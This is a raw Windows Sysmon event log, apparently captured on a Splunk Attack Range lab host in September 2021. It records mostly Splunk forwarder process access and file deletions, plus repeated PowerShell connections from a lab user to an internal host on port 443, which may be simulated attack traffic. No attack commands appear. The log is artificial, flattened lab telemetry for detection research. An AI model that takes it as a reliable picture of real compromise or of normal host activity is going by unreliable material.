Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E93E53D921DAA162726BC83B34BF438,SHA256=B85EDEB38609BD421541A36676669DC54A1D0CFB58BDA7DB32C67BB0D13B52F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:11.041{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8157-613A-8D96-03000000C801}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:11.041{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:11.041{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:11.041{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:11.041{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:11.041{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8157-613A-8D96-03000000C801}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:11.041{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8157-613A-8D96-03000000C801}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:11.026{B81B27B7-8157-613A-8D96-03000000C801}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035126610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:12.145{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4070F9848599473B0F1F346A33C7E818,SHA256=91AA10FD645626341D6B9F6A0DEF9739EC88ECD0C0EBA3D352986A907007FB91,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:13.161{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E70FE1086BED9B5973F303457260377,SHA256=5651347C4D7C4A5E3752D3CDC572F4B9B3914FDB8C52317E4FDD0D8E1A0DB66B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:14.243{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=079F3CD4FDB459C2F05730BA1DB1E12A,SHA256=B5BACC04AA95EF1457276265AB4AAFF772863A22A493AC0F2408188348185B71,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:14.174{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A992CDA8E7AAF0F932608A50A488B35C,SHA256=BA8587CE11B982EF21BED8485A2A0B88FA673F560762C8F448254C79F52EDDB3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:40.265{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61917-false10.0.1.12-8000- 354300x800000000000000035126615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:39.337{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61916-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:15.189{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B3FA3017CDC446AC4F3E5E218B24767,SHA256=5460525D6A1F4767867FFF480F65C451788D81148AB3DB58DACC55E4BE8AC1FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:16.207{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E8916FC900A118A59B8E0395EDC5B4F,SHA256=0D15155FBF06CF20C9A621612B1531198F17BBF2B0A4BDC0B3CB39E9AC216EF9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:17.241{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46FFD67222FA7D764E0DA3E6F2F7A39E,SHA256=361E79F4B3D48069D7AF12086AC74C3F40C1FDAAC1DF6C0E220052B8AD1628A4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:18.257{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=545EB953D9C5C547CF61CC14BBBA25B6,SHA256=E362C60CF08E30AA270DEE18325D6FE6B9DE0B2367F44A26CD2D3D4EA93B6D0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126620Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:19.288{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50BC4693EE2FFC772ACD4A0AAF856333,SHA256=EFE3AE197CB2A20F992B8D617EE2DF7F2E17D0AD451BD9A38B8DFC8B924F70EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:20.387{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FF512BEDD4933A532272E98DE5170D5C,SHA256=422F153DF6870BE7B0A445F380D6FED132C117F580487A8300A9BD071B442594,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:20.305{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAE43A3040C7ECF91317F0A6A6B0B118,SHA256=2B4C00ED9F9CB70349131ECBB97382921C5D2D485D08E0EB79E1DFEA43F2BABB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:46.299{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61919-false10.0.1.12-8000- 354300x800000000000000035126624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:45.347{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61918-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:21.323{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D06C83DC90E2EFE4A2257EDF8FDB84C,SHA256=8469F213A605ECCB90AB5498BFB0D97B759CE0EDF1877A2C91A2E3E815244FCF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:22.338{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB8BBEAE6D44EA1AFAEE768DF6F6F513,SHA256=80084B6419C46CACC9D8B8DAF9F24150C2DE80CC95B5A9716AB0DFB3683F6771,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:23.353{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B6A2279638BD7BCD40CD42F55665EC0,SHA256=344AEC4821AA410A891C58ED05764501E0988BA2F19F609912E4843EB3CC285A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:24.402{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45171B2F6400F80171085C3DC7819DB9,SHA256=2665C9863968F493612965F105161F674CEC20BC9A144C5688826B04E3AB7ED5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126631Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:50.360{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61920-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:25.405{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E4F1EB770EAC5E0638D10D5863286B0,SHA256=43E2996B6CBADC175977E563C92F095C60DAA1A4A196DE2B1E608320978438CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126629Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:25.203{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=66D609C83ED496527EDA070E41E1A671,SHA256=D07B374E5AF733A0F04CA598CF3136387CCA075E603BE768B873C40E425A4274,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126633Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:51.328{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61921-false10.0.1.12-8000- 23542300x800000000000000035126632Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:26.421{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=740675713385C47796C449B0D3D8F006,SHA256=C0250B143259BC6FE1FC736FD6041816846E04D89CE311F75A8726ACAAE7E935,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.902{B81B27B7-8167-613A-8F96-03000000C801}66046748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.735{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8167-613A-8F96-03000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.735{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126648Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.735{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126647Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.735{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126646Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.735{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-8167-613A-8F96-03000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126645Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.735{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.735{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8167-613A-8F96-03000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 